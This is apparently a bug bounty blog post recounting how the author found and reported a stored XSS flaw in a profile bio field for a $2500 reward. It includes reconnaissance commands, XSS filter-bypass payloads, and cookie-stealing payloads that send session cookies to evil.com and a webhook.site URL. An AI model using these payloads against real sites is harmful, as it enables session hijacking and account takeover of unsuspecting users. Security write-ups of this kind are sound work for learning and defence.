Open in app

Sign in

Write

Sign in

Home

Library

Stories

Stats

I Hacked a Million-Dollar Website with Just a Text Box — Earned $2500! (Full Story)

TheIndianNetwork

--

Images By — TheIndianNetwork

How I Turned a Simple Text Input into a Massive Stored XSS Exploit

Bug bounty hunting is all about patience, creativity, and deep understanding of security flaws. This is the full breakdown of how I went from basic information gathering to exploiting a critical stored XSS vulnerability in a high-profile web application, leading to a $2500 bug bounty reward. If you want to learn the exact process I used, buckle up!

Step 1: Information Gathering & Reconnaissance

Before jumping into testing, I spent hours mapping out the target application. Here’s what I did:

1. Subdomain Enumeration

  • Used tools like amass, Subfinder, and Assetfinder to collect all available subdomains.
  • Discovered an internal admin portal that wasn’t indexed publicly.
  • Tools used:
  • amass enum -passive -d target.com subfinder -d target.com assetfinder --subs-only target.com

2. Directory & Parameter Fuzzing

  • Used dirsearch to find hidden directories:
  • dirsearch -u https://admin.target.com -e php,html,js
  • Found a /profile/settings page where users could update their personal information.
  • The page had a text input field for bio updates.
  • Tested various encoding techniques and bypass methods using Burp Suite.

Step 2: Finding the Stored XSS Vulnerability

After testing the input field with various payloads, I noticed something interesting:

1. Initial Payload Testing

I started by entering a simple XSS payload:

<script>alert('XSS')</script>
  • At first, nothing happened. The input field sanitized basic <script> tags.
  • However, I noticed that the website allowed rich text formatting (like bold, italic, and links).

2. Bypassing Filters with SVG & Event Handlers

Since direct <script> tags were blocked, I tried an SVG-based XSS payload:

<svg onload=alert('XSS')></svg>

Result: Success! The alert box popped up immediately upon page reload.

3. JavaScript Event Handler Bypass

I then tested an alternative approach using an onmouseover event:

<a href="#" onmouseover="alert('XSS')">Hover me</a>
  • This worked when users hovered over the malicious link.
  • A great trick for triggering XSS without direct execution.

Step 3: Escalating the Attack

A basic alert box wasn’t enough. I wanted account takeover, so I crafted a payload that stole cookies and sent them to my server:

1. Creating a Malicious JavaScript Payload

<img src=x onerror="fetch('https://evil.com/steal?cookie='+document.cookie)">
  • This payload sent session cookies of any logged-in user to my controlled server.
  • This meant I could hijack admin accounts once they visited my profile page.

2. Exfiltrating Data with a Webhook

Instead of storing stolen cookies manually, I automated it using Webhook.site:

<script>
fetch('https://webhook.site/your-webhook-url?c='+document.cookie);
</script>
  • This captured cookies in real-time and displayed them on my webhook dashboard.

Step 4: Reporting & Getting Paid

Once I confirmed the exploit worked, I immediately reported it responsibly through the company’s bug bounty program.

1. Writing a Professional Bug Report

  • Summary: Stored XSS in the profile bio section.
  • Impact: Allows full session hijacking, leading to account takeover.
  • Steps to Reproduce:
  1. Log in to admin.target.com.
  2. Go to Profile SettingsBio field.
  3. Enter the following payload:
  • <svg onload=alert('XSS')></svg>
  1. Save changes and refresh the profile page.
  2. Observe the XSS execution.

2. The Reward

Within 48 hours, the company confirmed the vulnerability and awarded me a $2500 bug bounty!

Conclusion: How You Can Replicate My Success

If you want to earn big rewards like this, here’s what you should do:

1. Master Recon Techniques

  • Use tools like amass, Subfinder, Burp Suite, and dirsearch.

2. Understand XSS Bypass Techniques

  • Try payloads using SVG, onerror, iframe, JavaScript event handlers, and alternative encoding.

3. Test Input Fields in Depth

  • Profile sections, comment boxes, search bars — all are potential XSS targets.

4. Automate Your Testing

  • Use Burp Suite Intruder for automated fuzzing.
  • Leverage custom scripts for testing payloads at scale.

5. Learn to Write High-Quality Reports

  • Clear steps + impact analysis = higher bounties!

Final Thoughts

Finding this stored XSS and earning $2500 wasn’t luck — it was the result of proper recon, creative exploitation, and responsible disclosure. If you put in the effort, you can do this too!

🚀 Start hunting today — your next big payout is waiting!

📧 Contact me: theindiannetwork@protonmail.com
🌐 My Blog: theindiannetwork.medium.com
📺 My YouTube Channel: youtube.com/@theindiannetwork

Stored Xss
Xss Attack
Xss Vulnerability
Bug Bounty
Bug Bounty Tips

--

--

Responses (3)

Write a response

What are your thoughts?

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams